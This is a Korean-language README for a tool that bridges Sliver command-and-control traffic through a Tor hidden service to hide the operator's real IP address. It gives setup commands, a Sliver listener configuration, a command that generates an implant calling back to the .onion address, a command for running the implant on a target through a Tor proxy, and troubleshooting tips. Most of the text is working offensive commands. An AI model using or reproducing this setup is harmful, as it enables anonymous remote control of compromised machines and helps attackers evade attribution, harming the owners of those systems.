
Sliver C2를 위한 Tor 전송 브리지 - 익명 명령 및 제어
Sliver C2를 위한 Tor 기반 전송 브릿지입니다. 은닉 서비스를 생성하고 트래픽을 Sliver 서버로 프록시하여 실제 IP가 노출되지 않도록 합니다.
Tor 은닉 서비스를 설정하여 로컬 HTTP 프록시를 가리킵니다. 프록시는 모든 트래픽을 Sliver의 HTTPS 리스너로 전달합니다. 임플란트는 Tor를 통해 연결되며, 관리자는 평소처럼 Sliver를 통해 제어합니다.
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
HTTPS 리스너로 Sliver를 시작합니다:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
다른 터미널에서 브릿지를 시작합니다:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
출력은 다음과 유사합니다:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
.onion 주소를 기다린 후 임플란트를 생성합니다:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
대상에서 임플란트를 실행합니다 (Tor 필요):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port sliver https port (default 8443)
--tor-port tor socks port (default 9050)
--service-port hidden service port (default 80)
-c, --config config file path
기타 명령어:
sliver-tor-bridge status # check if hidden service is running
sliver-tor-bridge stop # clean up hidden service directory
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]브릿지는 중간에 위치하여 트래픽을 중계합니다. Sliver는 정상적인 HTTPS 연결을 받는다고 생각합니다. 임플란트는 일반 HTTP 서버와 통신한다고 생각합니다.
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # 명령줄 인터페이스
tor_manager.py # Tor 시작 및 은닉 서비스 생성
proxy.py # Sliver로 전달하는 Flask 앱
config.py # 설정 처리
Tor가 시작되지 않음: 시스템 Tor를 중지했는지 확인하세요 (sudo systemctl stop tor)
연결 시간 초과: Tor 부트스트랩은 1~3분 정도 소요될 수 있습니다. 100%가 될 때까지 기다리세요.
임플란트가 연결되지 않음: 임플란트가 Tor에 접근 가능한지 확인하세요 (socks 프록시 9050)
MIT